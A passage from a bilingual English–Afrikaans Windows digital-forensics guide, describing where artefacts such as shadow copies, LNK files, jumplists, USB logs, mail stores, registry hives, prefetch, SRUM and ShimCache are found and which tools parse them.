These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
Hierdie rugsteun kopieë is gewoonlik geleë in die `\System Volume Information` vanaf die wortel van die lêersisteem en die naam bestaan uit **UIDs** soos getoon in die volgende prentjie:
![](<../../../.gitbook/assets/image (520).png>)
Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
Deur die forensiese beeld te monteer met die **ArsenalImageMounter**, kan die instrument [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) gebruik word om 'n skadukopie te ondersoek en selfs die lêers uit die skadukopie-rugsteunkopieë te **onttrek**.
![](<../../../.gitbook/assets/image (521).png>)
The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
Die registerinskrywing `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` bevat die lêers en sleutels **wat nie rugsteunkopieë moet wees nie**:
![](<../../../.gitbook/assets/image (522).png>)
The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
Die register `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` bevat ook konfigurasie-inligting oor die `Volume Shadow Copies`.
### Office AutoSaved Files
### Office AutoSaved-lêers
You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
Jy kan die kantoor outomatiese gestoorde lêers vind in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
## Shell Items
A shell item is an item that contains information about how to access another file.
'n Skulpunt is 'n item wat inligting bevat oor hoe om toegang tot 'n ander lêer te verkry.
### Recent Documents (LNK)
### Onlangse Dokumente (LNK)
Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
Windows skep **outomaties** hierdie **kortpaaie** wanneer die gebruiker 'n lêer **open, gebruik of skep** in:
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created.
Wanneer 'n vouer geskep word, word 'n skakel na die vouer, na die ouervouer en die ouergrootouervouer ook geskep.
These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed.
Hierdie outomaties geskepte skakel lêers **bevat inligting oor die oorsprong** soos of dit 'n **lêer** **of** 'n **vouer** is, **MAC** **tye** van daardie lêer, **volume-inligting** van waar die lêer gestoor word en die **vouer van die teikenvouer**. Hierdie inligting kan nuttig wees om daardie lêers te herstel in die geval dat hulle verwyder is.
Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used.
Verder is die **skepdatum van die skakel** lêer die eerste **keer** wat die oorspronklike lêer **eerste** **gebruik** is en die **gewysigde datum** van die skakel lêer is die **laaste** **keer** wat die oorspronklike lêer gebruik is.
To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/).
Om hierdie lêers te ondersoek, kan jy die instrument [**LinkParser**](http://4discovery.com/our-tools/) gebruik.
In this tools you will find **2 sets** of timestamps:
In hierdie instrument sal jy **2 stelle** tydmerke vind:
* **First Set:**
1. FileModifiedDate
2. FileAccessDate
3. FileCreationDate
* **Second Set:**
1. LinkModifiedDate
2. LinkAccessDate
3. LinkCreationDate.
* **Eerste Stel:**
1. FileModifiedDate
2. FileAccessDate
3. FileCreationDate
* **Tweede Stel:**
1. LinkModifiedDate
2. LinkAccessDate
3. LinkCreationDate.
The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**.
You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
Die eerste stel tydmerke verwys na die **tydmerke van die lêer self**. Die tweede stel verwys na die **tydmerke van die gekoppelde lêer**.
Jy kan dieselfde inligting kry deur die Windows CLI-instrument [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) uit te voer.
```
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
```
In hierdie geval sal die inligting binne 'n CSV-lêer gestoor word.
In this case, the information is going to be saved inside a CSV file.
### Springlyste
### Jumplists
Dit is die onlangse lêers wat per toepassing aangedui word. Dit is die lys van onlangse lêers wat deur 'n toepassing gebruik word en waartoe jy toegang kan verkry op elke toepassing. Hulle kan outomaties geskep word of aangepas wees.
These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**.
Die outomaties geskepte springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Die springlyste word genoem volgens die formaat `{id}.autmaticDestinations-ms` waar die aanvanklike ID die ID van die toepassing is.
The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
Die aangepaste springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` en hulle word gewoonlik deur die toepassing geskep omdat iets belangrik met die lêer gebeur het (dalk as gunsteling gemerk).
The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite)
Die **geskepte tyd** van enige springlys dui die **eerste keer aan dat die lêer geopen is** en die **veranderde tyd die laaste keer**.
The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**.
You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
Jy kan die springlyste ondersoek met behulp van [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
![](<../../../.gitbook/assets/image (474).png>)
(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
(_Let daarop dat die tye wat deur JumplistExplorer verskaf word, verband hou met die springlys-lêer self_)
### Shellbags
[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
[**Volg hierdie skakel om uit te vind wat die shellbags is.**](interesting-windows-registry-keys.md#shellbags)
## Use of Windows USBs
## Gebruik van Windows USB's
It's possible to identify that a USB device was used thanks to the creation of:
Dit is moontlik om te identifiseer dat 'n USB-toestel gebruik is as gevolg van die skepping van:
* Windows Recent Folder
* Microsoft Office Recent Folder
* Jumplists
* Windows Onlangse Gids
* Microsoft Office Onlangse Gids
* Springlyste
Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
Let daarop dat sommige LNK-lêers in plaas van na die oorspronklike pad te verwys, na die WPDNSE-gids verwys:
![](<../../../.gitbook/assets/image (476).png>)
The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
Die lêers in die WPDNSE-gids is 'n kopie van die oorspronklike lêers en sal dus nie oorleef na 'n herlaai van die rekenaar nie, en die GUID word geneem uit 'n shellbag.
### Registry Information
### Registerinligting
[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices.
[Kyk na hierdie bladsy om uit te vind](interesting-windows-registry-keys.md#usb-information) watter registerkodes interessante inligting oor USB-aangeslote toestelle bevat.
### setupapi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
Kyk na die lêer `C:\Windows\inf\setupapi.dev.log` om die tye te kry wanneer die USB-aansluiting plaasgevind het (soek na `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB Detective
[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
[**USBDetective**](https://usbdetective.com) kan gebruik word om inligting te verkry oor die USB-toestelle wat aan 'n beeld gekoppel was.
![](<../../../.gitbook/assets/image (483).png>)
### Plug and Play Cleanup
### Inprop en Speel Skoonmaak
The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion.
Die geskeduleerde taak wat bekend staan as 'Inprop en Speel Skoonmaak' is primêr ontwerp vir die verwydering van verouderde bestuurdersweergawes. In teenstelling met sy gespesifiseerde doelwit om die nuutste bestuurderspakketweergawe te behou, dui aanlynbronne daarop dat dit ook mik op bestuurders wat vir 30 dae onaktief was. Gevolglik kan bestuurders vir verwyderbare toestelle wat nie in die afgelope 30 dae aangesluit is nie, onderhewig wees aan uitwissing.
The task is located at the following path:
Die taak is geleë by die volgende pad:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
A screenshot depicting the task's content is provided:
'n Skermkiekie wat die inhoud van die taak uitbeeld, word voorsien:
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
**Key Components and Settings of the Task:**
- **pnpclean.dll**: This DLL is responsible for the actual cleanup process.
- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine.
**Kernkomponente en instellings van die taak:**
- **pnpclean.dll**: Hierdie DLL is verantwoordelik vir die werklike skoonmaakproses.
- **UseUnifiedSchedulingEngine**: Gestel op `TRUE`, wat dui op die gebruik van die generiese taakbeplanning-enjin.
- **MaintenanceSettings**:
- **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
- **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
- **Period ('P1M')**: Stuur die Taakbeplanner om die skoonmaaktaak maandeliks tydens gereelde outomatiese instandhouding te begin.
- **Deadline ('P2M')**: Instrueer die Taakbeplanner, as die taak vir twee opeenvolgende maande misluk, om die taak tydens noodgevalle outomatiese instandhouding uit te voer.
This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures.
Hierdie konfigurasie verseker gereelde instandhouding en skoonmaak van bestuurders, met voorsiening vir herpoging van die taak in geval van opeenvolgende mislukkings.
**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
**Vir meer inligting, kyk na:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
## Emails
## E-posse
Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like:
E-posse bevat **2 interessante dele: Die koppe en die inhoud** van die e-pos. In die **koppe** kan jy inligting soos vind:
* **Who** sent the emails (email address, IP, mail servers that have redirected the email)
* **When** was the email sent
* **Wie** het die e-posse gestuur (e-posadres, IP, posbedieners wat die e-pos omgelei het)
* **Wanneer** is die e-posse gestuur
Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
Binne die `References` en `In-Reply-To` koppe kan jy ook die ID van die boodskappe vind:
![](<../../../.gitbook/assets/image (484).png>)
### Windows Mail App
### Windows-pos-app
This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension.
Hierdie toepassing stoor e-posse in HTML- of teksformaat. Jy kan die e-posse binne subgidsies binne `\Users\<gebruikersnaam>\AppData\Local\Comms\Unistore\data\3\` vind. Die e-posse word met die `.dat`-uitbreiding gestoor.
The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
Die **metadata** van die e-posse en die **kontakte** kan binne die **EDB-databasis** gevind word: `\Users\<gebruikersnaam>\AppData\Local\Comms\UnistoreDB\store.vol`
**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails.
**Verander die uitbreiding** van die lêer van `.vol` na `.edb` en jy kan die instrument [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) gebruik om dit oop te maak. Binne die `Message`-tabel kan jy die e-posse sien.
### Microsoft Outlook
When Exchange servers or Outlook clients are used there are going to be some MAPI headers:
Wanneer Exchange-bedieners of Outlook-kliënte gebruik word, sal daar sekere MAPI-koppe wees:
* `Mapi-Client-Submit-Time`: Time of the system when the email was sent
* `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread
* `Mapi-Entry-ID`: Message identifier.
* `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?)
* `Mapi-Client-Submit-Time`: Tyd van die stelsel toe die e-pos gestuur is
* `Mapi-Conversation-Index`: Aantal kinderboodskappe van die draad en tydstempel van elke boodskap van die draad
* `Mapi-Entry-ID`: Boodskapidentifiseerder.
* `Mappi-Message-Flags` en `Pr_last_Verb-Executed`: Inligting oor die MAPI-kliënt (boodskap gelees? nie gelees nie? geantwoord? omgelei? uit die kantoor?)
In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in:
In die Microsoft Outlook-kliënt word al die gestuur/ontvang boodskappe, kontakte-inligting en kalenderinligting gestoor in 'n PST-lêer in:
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP)
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used.
Die registerpad `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` dui die lêer aan wat gebruik word.
You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
Jy kan die PST-lêer oopmaak met die instrument [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
![](<../../../.gitbook/assets/image (485).png>)
### Microsoft Outlook OST-lêers
### Microsoft Outlook OST Files
'n **OST-lêer** word gegenereer deur Microsoft Outlook wanneer dit gekonfigureer is met 'n **IMAP** of 'n **Exchange**-bediener, wat soortgelyke inligting as 'n PST-lêer stoor. Hierdie lêer word gesinkroniseer met die bediener en behou data vir **die laaste 12 maande** tot 'n **maksimum grootte van 50GB**, en dit is geleë in dieselfde gids as die PST-lêer. Om 'n OST-lêer te sien, kan die [**Kernel OST-kieker**](https://www.nucleustechnologies.com/ost-viewer.html) gebruik word.
An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
### Terugwinning van Aanhegsels
### Retrieving Attachments
Verlore aanhegsels kan herwin word vanaf:
Lost attachments might be recoverable from:
- Vir **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- Vir **IE11 en hoër**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
### Thunderbird MBOX-lêers
### Thunderbird MBOX Files
**Thunderbird** maak gebruik van **MBOX-lêers** om data te stoor, geleë by `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
### Beeld Duimnaels
### Image Thumbnails
- **Windows XP en 8-8.1**: Toegang tot 'n gids met duimnaels skep 'n `thumbs.db`-lêer wat beeldvoorbeelde stoor, selfs na uitvee.
- **Windows 7/10**: `thumbs.db` word geskep wanneer dit oor 'n netwerk via 'n UNC-paad benader word.
- **Windows Vista en nuwer**: Duimnaelvoorbeelde word gekentraliseer in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` met lêers genaamd **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) en [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) is hulpmiddels vir die sien van hierdie lêers.
- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion.
- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path.
- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files.
### Windows Registerinligting
### Windows Registry Information
Die Windows-register, wat omvattende stelsel- en gebruikersaktiwiteitsdata stoor, word bevat binne lêers in:
The Windows Registry, storing extensive system and user activity data, is contained within files in:
- `%windir%\System32\Config` vir verskeie `HKEY_LOCAL_MACHINE` subleutels.
- `%UserProfile%{User}\NTUSER.DAT` vir `HKEY_CURRENT_USER`.
- Windows Vista en nuwer weergawe maak rugsteun van `HKEY_LOCAL_MACHINE` registerlêers in `%Windir%\System32\Config\RegBack\`.
- Daarbenewens word programuitvoeringsinligting gestoor in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` vanaf Windows Vista en Windows 2008 Server voortgaan.
- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys.
- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`.
- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`.
- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards.
### Hulpmiddels
### Tools
Sommige hulpmiddels is nuttig vir die analise van die registerlêers:
Some tools are useful to analyze the registry files:
* **Registerredakteur**: Dit is geïnstalleer in Windows. Dit is 'n GUI om deur die Windows-register van die huidige sessie te blaai.
* [**Registerverkenner**](https://ericzimmerman.github.io/#!index.md): Dit stel jou in staat om die registerlêer te laai en daardeur te blaai met 'n GUI. Dit bevat ook Bladmerke wat sleutels met interessante inligting uitlig.
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Weereens, dit het 'n GUI wat toelaat om deur die gelaai register te blaai en bevat ook plugins wat interessante inligting binne die gelaai register uitlig.
* [**Windows Registerherwinning**](https://www.mitec.cz/wrr.html): 'n Ander GUI-toepassing wat in staat is om die belangrike inligting uit die gelaai register te onttrek.
* **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session.
* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information.
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry.
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded.
### Herstel van Verwyderde Element
### Recovering Deleted Element
Wanneer 'n sleutel verwyder word, word dit as sodanig gemerk, maar dit sal nie verwyder word totdat die spasie wat dit beset word benodig nie. Daarom is dit moontlik om hierdie verwyderde sleutels te herstel deur gebruik te maak van hulpmiddels soos **Registerverkenner**.
When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys.
### Laaste Skryftyd
### Last Write Time
Each Key-Value contains a **timestamp** indicating the last time it was modified.
Elke Sleutel-Waarde bevat 'n **tydstempel** wat aandui wanneer dit laas gewysig is.
### SAM
The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system.
Die lêer/hive **SAM** bevat die **gebruikers, groepe en gebruikerswagwoorde**-hasings van die stelsel.
In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**.
In `SAM\Domains\Account\Users` kan jy die gebruikersnaam, die RID, laaste aanmelding, laaste mislukte aanmelding, aanmeldingteller, wagwoordbeleid en wanneer die rekening geskep is, verkry. Om die **hasings** te kry, het jy ook die lêer/hive **SYSTEM** **nodig**.
### Interesting entries in the Windows Registry
### Interessante inskrywings in die Windows-register
{% content-ref url="interesting-windows-registry-keys.md" %}
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
{% endcontent-ref %}
## Programs Executed
## Uitgevoerde Programme
### Basic Windows Processes
### Basiese Windows-prosesse
In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours.
In [hierdie berig](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) kan jy leer oor die algemene Windows-prosesse om verdagte gedrag te identifiseer.
### Windows Recent APPs
### Windows Onlangse Programme
Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched.
Binne die register `NTUSER.DAT` in die pad `Software\Microsoft\Current Version\Search\RecentApps` kan jy subleutels kry met inligting oor die **uitgevoerde toepassing**, **laaste keer** wat dit uitgevoer is, en **aantal kere** wat dit geloods is.
### BAM (Background Activity Moderator)
You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry).
Jy kan die `SYSTEM`-lêer oopmaak met 'n registerredakteur en binne die pad `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` kan jy die inligting oor die **toepassings wat deur elke gebruiker uitgevoer is** vind (merk die `{SID}` in die pad) en **watter tyd** hulle uitgevoer is (die tyd is binne die Data-waarde van die register).
### Windows Prefetch
Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker.
Prefetching is 'n tegniek wat 'n rekenaar in staat stel om stilweg die nodige hulpbronne op te haal wat nodig is om inhoud te vertoon wat 'n gebruiker **moontlik binnekort sal toegang** sodat hulpbronne vinniger toeganklik kan wees.
Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10.
Windows prefetch bestaan uit die skep van **kasgeheues van die uitgevoerde programme** om hulle vinniger te kan laai. Hierdie kasgeheues word geskep as `.pf`-lêers binne die pad: `C:\Windows\Prefetch`. Daar is 'n limiet van 128 lêers in XP/VISTA/WIN7 en 1024 lêers in Win8/Win10.
The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point.
Die lêernaam word geskep as `{program_naam}-{hash}.pf` (die hash is gebaseer op die pad en argumente van die uitvoerbare lêer). In W10 is hierdie lêers saamgedruk. Let daarop dat die blootwesigheid van die lêer aandui dat **die program op 'n stadium uitgevoer is**.
The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program.
To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
Die lêer `C:\Windows\Prefetch\Layout.ini` bevat die **name van die gids van die lêers wat geprefetch word**. Hierdie lêer bevat **inligting oor die aantal uitvoerings**, **datums** van die uitvoering en **lêers** **wat oop** is deur die program.
Om hierdie lêers te ondersoek, kan jy die hulpmiddel [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd) gebruik:
```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
![](<../../../.gitbook/assets/image (487).png>)
### Superprefetch
**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\
This service will generate database files in `C:\Windows\Prefetch\Ag*.db`.
**Superprefetch** het dieselfde doel as prefetch, **laai programme vinniger** deur te voorspel wat die volgende gelaaide item sal wees. Dit vervang egter nie die prefetch-diens nie.\
Hierdie diens sal databasislêers genereer in `C:\Windows\Prefetch\Ag*.db`.
In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**.
In hierdie databasisse kan jy die **naam** van die **program**, **aantal** **uitvoerings**, **geopen** **lêers**, **toegang tot** **volume**, **volledige** **pad**, **tydperke** en **tydstempels** vind.
You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
Jy kan hierdie inligting kry deur die hulpmiddel [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) te gebruik.
### SRUM
**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`.
**System Resource Usage Monitor** (SRUM) **monitor** die **hulpbronne** **verbruik** **deur 'n proses**. Dit het in W8 verskyn en stoor die data in 'n ESE-databasis wat in `C:\Windows\System32\sru\SRUDB.dat` geleë is.
It gives the following information:
Dit gee die volgende inligting:
* AppID and Path
* User that executed the process
* Sent Bytes
* Received Bytes
* Network Interface
* Connection duration
* Process duration
* AppID en Pad
* Gebruiker wat die proses uitgevoer het
* Gestuurde bytes
* Ontvangsbytes
* Netwerkinterface
* Verbindingsduur
* Prosesduur
This information is updated every 60 mins.
You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
Hierdie inligting word elke 60 minute opgedateer.
Jy kan die datum uit hierdie lêer kry deur die hulpmiddel [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) te gebruik.
```bash
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
```
### AppCompatCache (ShimCache)
The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include:
Die **AppCompatCache**, ook bekend as **ShimCache**, vorm deel van die **Application Compatibility Database** wat deur **Microsoft** ontwikkel is om programverenigbaarheidsprobleme aan te spreek. Hierdie stelselkomponent neem verskeie stukke lêermetadata op, wat insluit:
- Full path of the file
- Size of the file
- Last Modified time under **$Standard\_Information** (SI)
- Last Updated time of the ShimCache
- Process Execution Flag
- Volledige pad van die lêer
- Grootte van die lêer
- Laaste gewysigde tyd onder **$Standard\_Information** (SI)
- Laaste opgedateerde tyd van die ShimCache
- Prosesuitvoeringsvlag
Such data is stored within the registry at specific locations based on the version of the operating system:
Sodanige data word binne die register gestoor op spesifieke plekke gebaseer op die weergawe van die bedryfstelsel:
- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries.
- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively.
- Vir XP word die data gestoor onder `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` met 'n kapasiteit vir 96 inskrywings.
- Vir Server 2003, sowel as vir Windows-weergawes 2008, 2012, 2016, 7, 8 en 10, is die bergpad `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, wat onderskeidelik 512 en 1024 inskrywings akkommodeer.
To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
Om die gestoorde inligting te ontleden, word die [**AppCompatCacheParser**-hulpmiddel](https://github.com/EricZimmerman/AppCompatCacheParser) aanbeveel vir gebruik.
![](<../../../.gitbook/assets/image (488).png>)
### Amcache
The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`.
Die **Amcache.hve**-lêer is in wese 'n registerhys wat besonderhede oor toepassings wat op 'n stelsel uitgevoer is, registreer. Dit word tipies gevind by `C:\Windows\AppCompat\Programas\Amcache.hve`.
This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system.
To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format:
